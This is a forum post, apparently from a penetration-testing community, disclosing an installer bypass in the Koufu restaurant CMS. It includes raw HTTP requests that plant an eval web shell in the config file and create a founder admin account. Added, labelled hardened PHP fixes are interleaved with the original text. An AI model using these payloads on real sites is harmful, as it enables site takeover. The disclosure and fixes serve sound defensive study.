中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title: 口福科技 (Koufu Technology) restaurant CMS vulnerability (getshell possible)
Author: admin
Time: 2012-12-4 11:13
The problem is in /install/index.php. After installation finishes, the program creates an install.lock file in the program's root directory, but the check in /install/index.php for install.lock is written incorrectly.

<?php
if(file_exists("../install.lock"))
{
    header("Location: ../");//does not exit
}

//echo 'tst';exit;
require_once("init.php");
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{

As you can see, when the lock file exists the script only sends a 302 redirect with header() and never exits, so the logic below it still executes. At least two vulnerabilities follow from this.
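For reference, this is how the installer gate should be written. It is an added example, not the vendor's code or code from the post: the path and lock-file name follow the post, while `installer_is_locked()` and `finish_install()` are names made up for the example (PHP 7 or later).

```php
<?php
// Added example (not the vendor's code or the post's): the installer gate written
// so that nothing after it can run once installation is complete. The path and
// lock-file name follow the post; installer_is_locked() and finish_install() are
// names invented for this example. Requires PHP 7 or later.

// Resolve the lock relative to this script, not to the working directory.
define('INSTALL_LOCK', __DIR__ . '/../install.lock');

function installer_is_locked(string $lockFile = INSTALL_LOCK): bool
{
    return is_file($lockFile);
}

// Called by the last installer step. 'x' mode creates the file only if it does
// not exist yet, so two overlapping final requests cannot both "finish".
function finish_install(string $lockFile = INSTALL_LOCK): bool
{
    $fh = @fopen($lockFile, 'x');
    if ($fh === false) {
        return false;               // lock already present: refuse
    }
    fwrite($fh, gmdate('c') . "\n");
    fclose($fh);
    return true;
}

// Quoted (vulnerable) shape from the post: header() only queues a response
// header, PHP keeps executing, so every installer step below stays reachable.
//
//     if (file_exists("../install.lock")) {
//         header("Location: ../");   // no exit
//     }
//
// Hardened form: terminate immediately after the redirect, and do so before
// init.php or any other code is loaded. The gate must be the first statement.
if (installer_is_locked()) {
    header('Location: ../', true, 302);
    exit;                           // the statement the original is missing
}

require_once __DIR__ . '/init.php';

// Installer steps follow. They are only reachable while no lock file exists,
// and the final step calls finish_install() before redirecting to the site.
```

Beyond the missing `exit`, two things matter operationally: the lock check runs before any include, so a bug in `init.php` cannot bypass it, and the lock is created with `fopen(..., 'x')`, so a second request that reaches the last step after the first one has finished fails instead of silently re-running it. Deleting or denying access to the whole /install directory after deployment removes the attack surface entirely.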
1. getshell (very dangerous)

if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
    $smarty->assign("step",1);
    $smarty->display("index.html");
}elseif($_REQUEST['step']==2)
{
    $mysql_host=trim($_POST['mysql_host']);
    $mysql_user=trim($_POST['mysql_user']);
    $mysql_pwd=trim($_POST['mysql_pwd']);
    $mysql_db=trim($_POST['mysql_db']);
    $tblpre=trim($_POST['tblpre']);
    $domain==trim($_POST['domain']);
    $str="<?php \r\n";
    $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
    $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
    $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
    $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
    $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
    $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
    $str.='define("DOMAIN","'.$domain.'");'."\r\n";
    $str.='define("SKINS","default");'."\r\n";
    $str.='?>';
    file_put_contents("../config/config.inc.php",$str);//writes the submitted data into a PHP file

The code above writes the POSTed data straight into ../config/config.inc.php, so submitting the following POST request yields a one-line web shell:
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 126

mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD

But this method is very dangerous: it leaves the site unable to run.
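The root fix is to stop the script when install.lock exists; independently of that, the step-2 writer should never let submitted text become PHP code. Below is an added example (not the vendor's code) of a config writer that allow-lists each field and serializes every value with var_export(), so the payload above stays inside a string literal as data. The field and constant names follow the post; the regular expressions and the function names are this example's assumptions. Note that the quoted code's `$domain==trim($_POST['domain']);` compares instead of assigning, so DOMAIN is written as an empty string; the example assigns.

```php
<?php
// Added example (not the vendor's code): writing install settings into a PHP
// config file without letting submitted text become PHP code. Field/constant
// names follow the post; the validation patterns and function names are
// assumptions of this example. Requires PHP 7 or later.

function validate_install_input(array $post): array
{
    // Allow-list each field. Patterns are assumptions; tighten them to what the
    // deployment actually needs. The DB password is deliberately not listed:
    // it may contain anything and is only serialized safely below.
    $rules = [
        'mysql_host' => '/^[A-Za-z0-9.\-]{1,253}(:[0-9]{1,5})?$/',
        'mysql_user' => '/^[A-Za-z0-9_\-]{1,32}$/',
        'mysql_db'   => '/^[A-Za-z0-9_]{1,64}$/',
        'tblpre'     => '/^[A-Za-z0-9_]{0,20}$/',
        'domain'     => '/^[A-Za-z0-9.\-]{1,253}$/',
    ];
    $clean = [];
    foreach ($rules as $field => $pattern) {
        $value = trim((string)($post[$field] ?? ''));
        if (!preg_match($pattern, $value)) {
            throw new InvalidArgumentException("invalid value for $field");
        }
        $clean[$field] = $value;
    }
    $clean['mysql_pwd'] = (string)($post['mysql_pwd'] ?? '');
    return $clean;
}

function render_config(array $c): string
{
    // var_export() emits a quoted, escaped PHP string literal, so a value such as
    //   test");@eval($_POST[x]);?>//
    // stays inside the quotes as data even if validation were loosened.
    $defs = [
        'MYSQL_HOST'    => $c['mysql_host'],
        'MYSQL_USER'    => $c['mysql_user'],
        'MYSQL_PWD'     => $c['mysql_pwd'],
        'MYSQL_DB'      => $c['mysql_db'],
        'MYSQL_CHARSET' => 'GBK',
        'TABLE_PRE'     => $c['tblpre'],
        'DOMAIN'        => $c['domain'],   // assigned, not compared
        'SKINS'         => 'default',
    ];
    $out = "<?php\n";
    foreach ($defs as $name => $value) {
        $out .= 'define(' . var_export($name, true) . ', ' . var_export($value, true) . ");\n";
    }
    return $out;   // no closing ?> : nothing can trail the tag
}

function write_config(string $path, string $contents): void
{
    // Write a temp file in the same directory, then rename: a concurrent request
    // never includes a half-written config.
    $tmp = $path . '.tmp.' . bin2hex(random_bytes(4));
    if (file_put_contents($tmp, $contents, LOCK_EX) === false || !rename($tmp, $path)) {
        @unlink($tmp);
        throw new RuntimeException('could not write config');
    }
}

// Constructed input, nothing is written to disk here.
// 1) The host value from the post's request fails the allow-list and is rejected.
try {
    validate_install_input(['mysql_host' => 'test");@eval($_POST[x]);?>//', 'mysql_user' => '1']);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";    // invalid value for mysql_host
}
// 2) A password full of quotes and tags is serialized, not interpreted.
echo render_config(validate_install_input([
    'mysql_host' => 'localhost', 'mysql_user' => 'app', 'mysql_pwd' => 'p"w);?><?php',
    'mysql_db'   => 'koufu',     'tblpre'     => 'koufu_', 'domain' => 'www',
]));
```

The output of the second call contains `define('MYSQL_PWD', 'p"w);?><?php');`, a single-quoted literal in which `?>` is just text, which is the property the original concatenation lacks. Validation and serialization are separate layers on purpose: the allow-list rejects the obvious attack, and var_export() guarantees that whatever does get through is still only a string.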
2. Directly adding an administrator

elseif($_REQUEST['step']==5)
{
    if($_POST)
    {
        require_once("../config/config.inc.php");
        $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
        mysql_select_db(MYSQL_DB,$link);
        mysql_query("SET NAMES ".MYSQL_CHARSET );
        mysql_query("SET sql_mode=''");

        $adminname=trim($_POST['adminname']);
        $pwd1=trim($_POST['pwd1']);
        $pwd2=trim($_POST['pwd2']);
        if(empty($adminname))
        {
            echo "<script>alert('管理员不能为空');history.go(-1);</script>";
            exit();
        }
        if(($pwd1!=$pwd2) or empty($pwd1))
        {
            echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//this branch does not exit either
        }
        mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//an administrator can be inserted directly
    }

This way we can directly insert an administrator account qingshen/qingshen; the request is as follows:
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.2cto.com/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

adminname=qingshen&pwd1=qingshen&pwd2=qingshen
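The step-5 handler has the same shape of defect as the lock check: a failed check prints a message and falls through to the INSERT. Below is an added example (not the vendor's code) of that step with each failure terminating the request, a one-shot guard so a founder can only ever be created once, and the INSERT parameterised instead of built from the form fields. Table and column names and the MYSQL_* constants follow the post; the function names are invented here, and `password_hash()` stands in for the post's `umd5()`, whose definition is not on the page.

```php
<?php
// Added example (not the vendor's code): the "create founder admin" step with
// its control flow and query fixed. Table/column names and MYSQL_* constants
// follow the post; function names are this example's; password_hash() replaces
// the umd5() helper the post references but does not show. PHP 7 or later.

require_once __DIR__ . '/../config/config.inc.php';   // defines MYSQL_* and TABLE_PRE

function validate_admin_form(array $post): array
{
    $adminname = trim((string)($post['adminname'] ?? ''));
    $pwd1 = (string)($post['pwd1'] ?? '');
    $pwd2 = (string)($post['pwd2'] ?? '');

    // Every failure returns an error and the caller stops. In the quoted code the
    // password-mismatch branch only echoed an alert and the INSERT ran anyway.
    if ($adminname === '' || !preg_match('/^[A-Za-z0-9_]{1,32}$/', $adminname)) {
        return ['ok' => false, 'error' => 'admin name is empty or invalid'];
    }
    if ($pwd1 === '' || $pwd1 !== $pwd2) {
        return ['ok' => false, 'error' => 'passwords are empty or do not match'];
    }
    return ['ok' => true, 'adminname' => $adminname, 'password' => $pwd1];
}

function create_founder(PDO $db, string $tablePre, array $form): void
{
    // One-shot: refuse if a founder already exists, so even a re-reached installer
    // cannot add a second privileged account.
    $table = '`' . $tablePre . 'admin`';   // prefix must be allow-listed when written
    $exists = $db->query('SELECT COUNT(*) FROM ' . $table . ' WHERE isfounder = 1')->fetchColumn();
    if ((int)$exists > 0) {
        throw new RuntimeException('a founder account already exists');
    }
    // Parameterised INSERT: the name is bound, never concatenated into SQL.
    $stmt = $db->prepare('INSERT INTO ' . $table . ' (adminname, password, isfounder) VALUES (?, ?, 1)');
    $stmt->execute([$form['adminname'], password_hash($form['password'], PASSWORD_DEFAULT)]);
}

// Handler. The install-lock gate at the top of the script runs before this point
// and exits when the lock exists; this step is unreachable after installation.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $form = validate_admin_form($_POST);
    if (!$form['ok']) {
        http_response_code(400);
        echo htmlspecialchars($form['error'], ENT_QUOTES, 'UTF-8');
        exit;                        // stop here; nothing below runs
    }
    $db = new PDO(
        'mysql:host=' . MYSQL_HOST . ';dbname=' . MYSQL_DB . ';charset=' . MYSQL_CHARSET,
        MYSQL_USER,
        MYSQL_PWD,
        [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]
    );
    create_founder($db, TABLE_PRE, $form);
    echo 'founder created';
}
```

The two changes that matter for this bug are the `exit` after every rejected form and the existence check before the INSERT; the prepared statement is the natural hardening once the query is touched at all, since the quoted code interpolates `$adminname` directly into the SQL string.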
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2